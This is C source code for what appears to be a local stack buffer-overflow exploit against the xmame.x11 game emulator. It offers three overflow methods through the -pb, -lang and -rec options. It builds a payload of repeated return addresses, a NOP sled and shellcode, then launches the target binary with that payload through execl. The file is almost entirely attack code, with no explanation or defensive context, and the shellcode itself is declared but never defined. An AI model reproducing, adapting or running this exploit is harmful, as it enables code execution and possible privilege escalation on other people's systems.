
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int atoi (char*) ;
 int execl (char*,char*,char*,char*,int ) ;
 int free (char*) ;
 char* malloc (int) ;
 int printf (char*) ;
 int * shellcode ;
 long sp () ;
 int strlen (int *) ;
 int usage () ;

int main(int argc, char *argv[])
{

 int i, offset, input, size;
 long esp, ret;
 long *addr_ptr;
 char *buf, *ptr, *f;
 offset = 0;
 esp = sp();
 ret = esp - offset;

 if(argc != 2) {
  usage();
  return 1;
 }
 input=atoi(argv[1]);
 switch(input) {
  case 1: printf("Using -pb overflow method\n");
    size=1037;
    f="-pb";
    break;
  case 2: printf("Using -lang overflow method\n");
    size=1057;
    f="-lang";
    break;
  case 3: printf("Using -rec overflow method\n");
    size=1057;
    f="-rec";
    break;

  default: usage();
    return 1;
 }
 buf=malloc(size);
 ptr = buf;
 addr_ptr = (long *) ptr;
 for(i=0; i<size; i+=4)
  *(addr_ptr++) = ret;

 for(i=0; i < 590; i++)
  buf[i] = '\x90';

 ptr = buf + 590;
 for(i=0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode[i];

 buf[size-1]=0;


 execl("/usr/games/xmame.x11","/usr/games/xmame.x11",f,buf,0);
 free(buf);

 return 0;
}
